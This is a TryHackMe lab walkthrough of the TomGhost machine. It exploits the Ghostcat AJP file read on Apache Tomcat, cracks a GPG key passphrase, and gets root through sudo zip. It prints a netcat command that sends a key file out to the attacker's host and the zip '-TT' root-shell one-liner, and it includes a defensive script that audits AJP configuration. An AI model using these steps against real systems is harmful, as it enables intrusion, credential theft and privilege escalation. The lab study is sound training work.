CTF Walkthroughs, TryHackMe

TryHackMe – TomGhost Walkthrough

Introduction

This was an easy Linux machine that involved exploiting the Ghostcat vulnerability affecting Apache Tomcat to gain initial access, cracking the passphrase hash of a GPG private key, and exploiting the Zip binary with Sudo permissions enabled to escalate privileges to root.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, using the following flags:

  • -sC to run default scripts
  • -sV to enumerate application versions

The scan has identified a few open ports: 22 (SSH), 53 (DNS), 8009 (Apache JServ) and 8080 (HTTP using Apache Tomcat). The next step will be to start enumerating HTTP.

Enumerating HTTP

When navigating to the site on port 8080, it leads to the Tomcat home page, which appears to be version 9.0.30:

When consulting the Apache JServ Pentesting section on HackTricks, it mentions a known vulnerability called Ghostcat, a local file inclusion that can allow attackers to obtain the contents of local files on the server, although what can be read is somewhat limited:

The Apache JServ Protocol (AJP) is a binary version of the HTTP protocol, primarily used when clustering or reverse proxying is required, as it is optimized for these scenarios. This issue can only occur if the AJP Connector (running on port 8009) is exposed externally, which is not a recommended configuration, as there is no need for it to be publicly accessible.
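A small configuration check for the point above, added here as an example and not part of the original walkthrough: it parses a Tomcat server.xml (a constructed sample is embedded) and reports AJP connectors that listen on a non-loopback address or do not require a shared secret. The Connector attributes used (port, protocol, address, secretRequired, secret) are the standard Tomcat ones.

```python
import xml.etree.ElementTree as ET

# Constructed sample server.xml: one AJP connector with no address attribute
# (older Tomcat releases then bind to all interfaces) and no secret, and one
# bound to loopback with a shared secret configured.
SAMPLE_SERVER_XML = """<?xml version="1.0" encoding="UTF-8"?>
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
    <Connector port="8010" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="REPLACE_WITH_A_LONG_RANDOM_SECRET"/>
  </Service>
</Server>
"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def audit_ajp_connectors(server_xml: str) -> list:
    """Return one finding per AJP connector that is not safely configured.

    A connector is reported when it is reachable from other hosts (bound to a
    non-loopback address, or no address attribute at all) and/or when it does
    not require a shared secret. Exposure alone is enough for a Ghostcat-style
    file read, so it is reported even when a secret is set.
    """
    findings = []
    root = ET.fromstring(server_xml)
    for conn in root.iter("Connector"):
        proto = conn.get("protocol", "HTTP/1.1")
        if "AJP" not in proto.upper():  # matches AJP/1.3 and AjpNioProtocol
            continue
        # Missing address is treated as all interfaces (the pre-9.0.31 default).
        address = conn.get("address", "0.0.0.0")
        secret_required = conn.get("secretRequired", "false").lower() == "true"
        has_secret = bool(conn.get("secret"))
        issues = []
        if address not in LOOPBACK:
            issues.append("AJP bound to non-loopback address %s" % address)
        if not (secret_required and has_secret):
            issues.append("no shared secret required")
        if issues:
            findings.append({"port": conn.get("port"), "address": address,
                             "issues": issues})
    return findings


if __name__ == "__main__":
    for f in audit_ajp_connectors(SAMPLE_SERVER_XML):
        print("port %s (%s): %s" % (f["port"], f["address"], "; ".join(f["issues"])))
```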

Exploiting Ghostcat

Cloning the exploit mentioned in HackTricks:

Running the exploit makes it possible to read the web.xml file, which contains user credentials:

As it turns out, skyfuck is an actual user on the machine, so the credentials can be used to authenticate over SSH:

The first flag can be found in the home directory of the merlin user:

Privilege Escalation

A “tryhackme.asc” file can be found in the current user’s home directory, which appears to be a PGP private key:

As it turns out, a passphrase is required to use the key to decrypt the credential.pgp file:

Transferring the key to the kali host using Netcat:

# on the local (Kali) host: start the listener first, writing whatever arrives to a file
sudo nc -lvnp 443 > tryhackme.asc
# on the remote host: send the key file to the listener
nc 10.4.36.186 443 < tryhackme.asc

Extracting the hash from the key using the GPG2John tool:

Using John the Ripper with the following flags to crack the previously found hashes:

  • --wordlist to specify the wordlist to be used, in this case rockyou
  • the text file containing the hashes, one per line

Importing the key and using it to decrypt the credentials:

# import the private key into the local keyring
gpg --import tryhackme.asc
# decrypt the credential file; gpg prompts for the passphrase cracked with John
gpg --decrypt credential.pgp

The password for the merlin user was found. Changing user:

When running sudo -l, it appears that the merlin user can execute the Zip binary as root:

Upon consulting GTFOBins, it appears this can easily be exploited to escalate privileges.

According to the Zip man page, the -T flag tests the integrity of the archive being created, and the -TT option specifies the command to run for that test (the archive name is appended to it), which means an arbitrary command can be supplied:

This effectively provides arbitrary command execution as root. Running the commands mentioned above:

# generate a temporary archive name without creating the file (mktemp -u only prints it)
TF=$(mktemp -u)
# -T tests the archive, -TT replaces the test command with 'sh #'; the trailing '#'
# comments out the appended archive name, so zip spawns a root shell
sudo zip $TF /etc/hosts -T -TT 'sh #'

This has granted root-level access to the machine.

Conclusion

This was a very interesting box: the exploitation process was quite unique and the vulnerability was new to me, and the privilege escalation part was also nice as it involved cracking a GPG key passphrase.